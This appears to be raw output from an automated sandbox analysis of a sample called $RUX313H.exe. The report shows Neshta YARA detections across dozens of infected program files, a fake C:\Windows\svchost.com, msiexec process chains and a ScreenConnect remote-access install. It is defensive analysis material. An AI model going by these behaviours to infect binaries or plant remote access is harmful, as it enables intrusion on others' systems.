Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Windows\svchost.com, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIDF2.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Windows\svchost.com
Source: $RUX313H.exe.0.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: $RUX313H.exe.0.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: $RUX313H.exe.0.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: $RUX313H.exe.0.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: $RUX313H.exe.0.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: $RUX313H.exe | Binary or memory string: OriginalFilename vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs $RUX313H.exe
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000002.682658964.0000000005BC0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs $RUX313H.exe
Source: $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs $RUX313H.exe
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\$RUX313H.exe.log
Source: classification engine | Classification label: mal100.spre.spyw.evad.winEXE@22/143@11/2
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Code function: StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear, 9_2_003F1880
Source: C:\Users\user\Desktop\$RUX313H.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Code function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear, 9_2_003F1880
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Code function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear, 9_2_003F1880
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Code function: 1_2_00DF1010 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,FindResourceW,LoadResource,LockResource,SizeofResource,SafeArrayCreateVector,SafeArrayAccessData,_memmove,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear, 1_2_00DF1010
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)
Source: C:\Users\user\Desktop\$RUX313H.exe | File read: C:\Users\user\Desktop\$RUX313H.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\$RUX313H.exe 'C:\Users\user\Desktop\$RUX313H.exe'
Source: C:\Users\user\Desktop\$RUX313H.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Process created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C
